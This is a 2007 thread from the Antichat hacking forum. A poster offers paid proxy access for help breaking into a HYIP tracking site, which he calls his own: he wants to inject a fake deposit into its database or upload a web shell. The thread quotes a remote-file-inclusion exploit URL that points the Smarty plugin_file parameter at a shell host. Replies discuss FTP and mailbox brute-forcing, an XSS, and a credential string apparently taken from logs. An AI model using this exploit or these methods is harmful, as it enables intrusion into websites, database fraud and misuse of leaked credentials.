Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)
-   О Работе (https://forum.antichat.xyz/forumdisplay.php?f=57)
-   -   нужна помощь по скрипту за вознаграждение (https://forum.antichat.xyz/showthread.php?t=43218)

dokwill 27.06.2007 19:52
нужна помощь по скрипту за вознаграждение
 
нужна помощь по скрипту за вознаграждение
http://www.megahyiptracer.com/hybann/h/
сдесь лежит мой скрипт - ( это соответственно мой сайт)

вопрос такой - несколько специфический
в этом скрипте и на этом движке есть возможность
видимо через sql injection или как то иначе пропихнуть в базу данных свой депозит.

мне требуется помощь в этом вопросе
нужен вход в базу ( сама строка есть)
либо метод или способ закачки файла(шелл) в
директорию сайта

имеется сам скрипт - могу переслать
имеются название и структура бд

есть публикации такой уязвимости

vendor : www.goldcoders.com
BY : www.hackerz.ir userz,ali
filez ----
inc/libs/Smarty.class.php
inc/libs/Smarty_Compiler.class.php
inc/libs/core/core.display_debug_console.php
inc/libs/core/core.load_plugins.php
inc/libs/core/core.load_resource_plugin.php
inc/libs/core/core.process_cached_inserts.php
inc/libs/core/core.process_compiled_include.php
inc/libs/core/core.read_cache_file.php
+++++++++++++++++++++++++++++++++
u can find more then this one
exploit :
http://victim/inc/libs/Smarty_Compiler.class.php?plugin_file=http://shell/?

ну у меня что то не катит она - мож не стой стороны сморю


вознаграждение - я на своем сайте подвешу ваш
запороленый proxy соответственно все логи и тд будут по вашей просьбе удалены. - скорость 2мбита трафика дам до 1 гига.
стучите все заинтересованные
291783239

censored! 27.06.2007 23:48
А может там смарти обновили, либо четко прописано откуда подгружать плагины?

dokwill 28.06.2007 00:17
я специально поставил скрипт образца 05. 2006 - чтобы понять откуда ноги.
но никак не вычислю вход для mysql inject

пока единственный вариант брут фтп - но это последнее дело

хотелось бы без этого обойтись

Hawkins 04.07.2007 12:20
Посмотрел в логах, нарыл подобную строку
admin@megahyiptracer.com:dokwill
Может банально в то время использовался один пасс?
Или сбрутили мыльник dokwill[at]rambler.ru, потом восстановили логин/пасс от фтп?
Зыж в гк скрипте ещё есть активная xss, вполне возможно, что была именно она использованна.
(пхп инклуд в Smarty у меня не прошёл ни на одном мониторе/хайпе, погуглил ещё - нашёл описание 1 в 1 для совершенно другого скрипта, но там тоже были эти-же файлы. Там прокатывало, возможно автор просто решил выпендриться и запостить "уязвимость" для гк скриптов.)


Время: 22:01